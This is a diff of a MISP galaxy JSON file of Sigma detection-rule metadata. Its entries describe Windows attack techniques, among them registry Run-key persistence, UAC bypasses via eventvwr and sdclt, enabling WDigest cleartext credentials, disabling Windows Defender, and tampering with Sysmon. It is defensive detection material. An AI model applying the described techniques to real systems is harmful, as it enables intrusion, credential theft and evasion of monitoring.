], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "uuid": "e0813366-0407-449a-9869-a2db1119dc41", - "value": "Suspicious Printer Driver Empty Manufacturer", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1410545674773467140", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "creation_date": "2020/07/01", - "filename": "registry_set_susp_printer_driver.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "value": "Registry Persistence via Explorer Run Key", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2018/07/18", - "filename": "registry_set_susp_reg_persist_explorer_run.yml", - "author": "Florian Roth, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "value": "New RUN Key Pointing to Suspicious Folder", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2018/08/25", - "filename": "registry_set_susp_run_key_img_folder.yml", - "author": "Florian Roth, Markus Neis, Sander Wiebing", - "level": "high", - "falsepositive": [ - "Software using weird folders for updates" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", - "value": "Suspicious Service Installed", - "meta": { - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" - ], - "tags": [ - "attack.t1562.001", - "attack.defense_evasion" - ], - "creation_date": "2019/04/08", - "filename": "registry_set_susp_service_installed.yml", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "level": "medium", - "falsepositive": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "value": "Modify User Shell Folders Startup Value", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" - ], - "creation_date": "2022/10/01", - "filename": "registry_set_susp_user_shell_folders.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "value": "Scheduled TaskCache Change by Uncommon Program", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://labs.f-secure.com/blog/scheduled-task-tampering/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" - ], - "creation_date": "2021/06/18", - "filename": "registry_set_taskcache_entry.yml", - "author": "Syed Hasan (@syedhasan009)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence method using windows telemetry", - "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "value": "Registry Persistence Mechanism via Windows Telemetry", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2020/10/16", - "filename": "registry_set_telemetry_persistence.yml", - "author": "Lednyov Alexey, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "value": "RDP Sensitive Settings Changed to Zero", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2022/09/29", - "filename": "registry_set_terminal_server_suspicious.yml", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", - "value": "RDP Sensitive Settings Changed", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2022/08/06", - "filename": "registry_set_terminal_server_tampering.yml", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "value": "Set TimeProviders DllName", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "creation_date": "2022/06/19", - "filename": "registry_set_timeproviders_dllname.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", - "value": "COM Hijacking via TreatAs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/08/28", - "filename": "registry_set_treatas_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects UAC bypass method using Windows event viewer", - "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "value": "UAC Bypass via Event Viewer - Registry Set", - "meta": { - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ], - "creation_date": "2017/03/19", - "filename": "registry_set_uac_bypass_eventvwr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", - "value": "UAC Bypass via Sdclt", - "meta": { - "refs": [ - "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ], - "creation_date": "2017/03/17", - "filename": "registry_set_uac_bypass_sdclt.yml", - "author": "Omer Yampel, Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", - "value": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "registry_set_uac_bypass_winsat.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", - "value": "UAC Bypass Using Windows Media Player - Registry", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "registry_set_uac_bypass_wmp.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", - "value": "VBScript Payload Stored in Registry", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/03/05", - "filename": "registry_set_vbs_payload_stored.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", - "value": "Execution DLL of Choice Using WAB.EXE", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", - "https://twitter.com/Hexacorn/status/991447379864932352", - "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/13", - "filename": "registry_set_wab_dllpath_reg_change.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", - "value": "Wdigest Enable UseLogonCredential", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2019/09/12", - "filename": "registry_set_wdigest_enable_uselogoncredential.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", - "value": "Disable Windows Defender Functionalities Via Registry Keys", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_windows_defender_tamper.yml", - "author": "AlertIQ, J\u00e1n Tren\u010dansk\u00fd, frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", - "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", - "value": "Winlogon AllowMultipleTSSessions Enable", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/09/09", - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitmate use of the multi session functionality" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "value": "Winlogon Notify Key Logon Persistence", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ], - "creation_date": "2021/12/30", - "filename": "registry_set_winlogon_notify_key.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "value": "Add DLLPathOverride Entry For Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/naturallanguage6.html", - "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "regsitry_set_natural_language_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects Accessing to lsass.exe by Powershell", - "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc", - "value": "Accessing WinAPI in PowerShell for Credentials Dumping", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/10/06", - "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "value": "Sysmon Configuration Change", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/12", - "filename": "sysmon_config_modification.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative action" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "value": "Sysmon Configuration Error", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ], - "creation_date": "2021/06/04", - "filename": "sysmon_config_modification_error.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate administrative action" - ], - "logsource.category": "sysmon_error", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "value": "Sysmon Configuration Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ], - "creation_date": "2021/06/04", - "filename": "sysmon_config_modification_status.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate administrative action" - ], - "logsource.category": "sysmon_status", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.", - "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65", - "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" - ], - "creation_date": "2020/10/12", - "filename": "sysmon_dcom_iertutil_dll_hijack.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "value": "Sysmon Blocked Executable", - "meta": { - "refs": [ - "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/16", - "filename": "sysmon_file_block_exe.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_block", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "value": "Sysmon Process Hollowing Detection", - "meta": { - "refs": [ - "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", - "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" - ], - "creation_date": "2022/01/25", - "filename": "sysmon_process_hollowing.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", - "level": "high", - "falsepositive": [ - "There are no known false positives at this time" - ], - "logsource.category": "process_tampering", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of WMI event subscription persistence method", - "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "value": "WMI Event Subscription", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2019/01/12", - "filename": "sysmon_wmi_event_subscription.yml", - "author": "Tom Ueltschi (@c_APT_ure)", - "level": "medium", - "falsepositive": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" - ], - "logsource.category": "wmi_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious encoded payloads in WMI Event Consumers", - "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", - "value": "Suspicious Encoded Scripts in a WMI Consumer", - "meta": { - "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2021/09/01", - "filename": "sysmon_wmi_susp_encoded_scripts.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "wmi_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", - "value": "Suspicious Scripting in a WMI Consumer", - "meta": { - "refs": [ - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", - "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "creation_date": "2019/04/15", - "filename": "sysmon_wmi_susp_scripting.yml", - "author": "Florian Roth, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Legitimate administrative scripts" - ], - "logsource.category": "wmi_event", - "logsource.product": "windows" - } - } - ], - "version": 1 -} \ No newline at end of file + "authors": [ + "@Joseliyo_Jstnk" + ], + "category": "rules", + "description": "MISP galaxy cluster based on Sigma Rules.", + "name": "Sigma-Rules", + "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", + "type": "sigma-rules", + "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", + "values": [ + { + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_exploiting.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "value": "Antivirus Exploitation Framework Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_hacktool.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", + "value": "Antivirus Hacktool Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_password_dumper.yml", + "level": "critical", + "logsource.category": "antivirus", + 